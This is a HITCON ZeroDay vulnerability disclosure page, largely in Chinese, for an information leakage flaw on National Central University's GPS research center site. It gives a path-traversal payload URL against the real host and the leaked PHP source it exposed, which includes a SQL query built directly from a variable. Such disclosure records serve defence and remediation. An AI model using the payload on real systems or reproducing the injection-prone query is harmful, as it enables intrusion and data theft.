Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2018-01390
- Vendor: 國立中央大學
- Title: 國立中央大學全球定位科學與應用研究中心 Information Leakage
- Introduction: 語法完整洩漏
處理狀態
目前狀態
-
新提交
-
已審核
-
已通報
-
未回報修補狀況
-
未複測
-
公開
處理歷程
- 2018/09/18 15:09:22 : 新提交 (由 Noth 更新此狀態)
- 2018/09/18 22:34:39 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2018/09/20 10:34:20 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2018/09/20 10:34:20 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2018/11/18 03:00:05 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2018-01390
- 通報者:Cake7528064 (Noth)
- 風險:中
- 類型:資訊洩漏 (Information Leakage)
參考資料
OWASP 漏洞說明 (Top 10 2017 - A3 Sensitive Data Exposure)
https://www.owasp.org/index.php/Top_10-2017_A3-Sensitive_Data_Exposure
CWE-200 漏洞說明
https://cwe.mitre.org/data/definitions/200.html
相關網址
敘述
重現:
利用google hacking 發現此網站
payload:
http://www.gpsarc.ncu.edu.tw/center/php/data.php?da=../m_login.php
SQL語法洩漏
", $row); //原程式碼 //$output[] = $row; } @mysql_free_result($result); @mysql_close($conn); return $output; } function sql_f($query,$database="edda") { global $host, $user, $pass; $conn=@mysql_connect( $host, $user, $pass ); mysql_query('SET NAMES utf8'); $result=@mysql_db_query( $database, $query, $conn); $row=@mysql_fetch_row($result); @mysql_data_seek($result,0); while($row=@mysql_fetch_row($result)) { $output[] = $row[0]; } @mysql_free_result($result); @mysql_close($conn); return $output; } global $page,$conn,$title,$time,$type,$conn,$v,$pp,$up; if($iid==''){ header("Location: m_login.php"); exit; } else $name = sql_d("SELECT name FROM login WHERE id='$iid'"); ?>